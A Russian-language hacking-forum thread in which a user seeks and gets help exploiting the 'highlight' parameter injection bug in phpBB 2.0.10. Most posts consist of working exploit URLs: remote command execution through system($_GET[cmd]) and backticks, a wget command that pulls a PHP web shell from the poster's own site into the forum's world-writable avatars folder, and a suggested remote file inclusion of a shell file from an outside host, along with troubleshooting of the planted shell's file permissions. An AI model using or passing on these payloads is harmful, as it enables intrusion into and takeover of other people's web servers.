highlight В общем, необходимо взломать форум phpbb 2.0.10 путём эксплуатации баги в highlight. Мне не нужно взламывать конкретный форум, просто хочу научиться использовать эту багу. Вот что я пробовал: Code: http://сайт/forum/viewtopic.php?p=337&highlight=%2527.$poster=`pwd`.%2527 Выдаёт(там где должно быть имя чела): Code: /pub/home/taymen30/сайт/forum Потом пробую: Code: http://сайт/forum/viewtopic.php?p=337&highlight=%2527.$poster=`$cmd`.%2527&cmd=cd%20..;ls%20-l Выдаёт\b#i В чём я делаю ошибку?Может кто поможет...
k1borg, спасибо! Ты мне помог, опираясь на твою подсказку я нашёл де-то на других форумах другой код. Но теперь возникла другая проблема. Например, делаю такой запрос: Code: http://форум/viewtopic.php?p=228&highlight=%2527.system($_GET[cmd]).include%2527&cmd=ls%20-l%20/usr/home/сайт/public_html/директория форума/images Всё ОК, выдаёт все файлы. Смотрю, у директории avatars права drwxrwxrwx Делаю запрос: Code: http://сайт/viewtopic.php?p=228&highlight=%2527.system($_GET[cmd]).include%2527&cmd=wget%20http://мой сайт.narod.ru/shell.php%20-P%20/usr/home/сайт/public_html/форум/images/avatars/ Затем смотрюнет ли шелла через ls- его нет ни в директории avatars нигде! =(
Всё, народ, справился сам...только одно не получается:я когда закачиваю шелл на форум, то у него права становятся: -rw------- То есть открыть его я не могу. Что мне делать-то? Нужно чтобы права стали: -rw-rw---- Закачиваю fetch'ем
Че за.... Че за белеберда коглда я ввожу:&highlight=%2527.$poster=`$cmd`.%2527&cmd=cd ..;ls -l Получаю: )\b#i
попробуй воспользоваться поиском по форуму, уверен тем с таким содержанием не один десяток, а так возможно запрешено выполнение системных команд в php, пробуй инклюдинг - &test=http://site.com/shell.txt?&highlight=%2527.include($_GET[test]).%2527
при заливке wget'ом так оно и будет, а если не заливается - возможно wget не установлен на сервере или нет прав на запись его там может и не быть
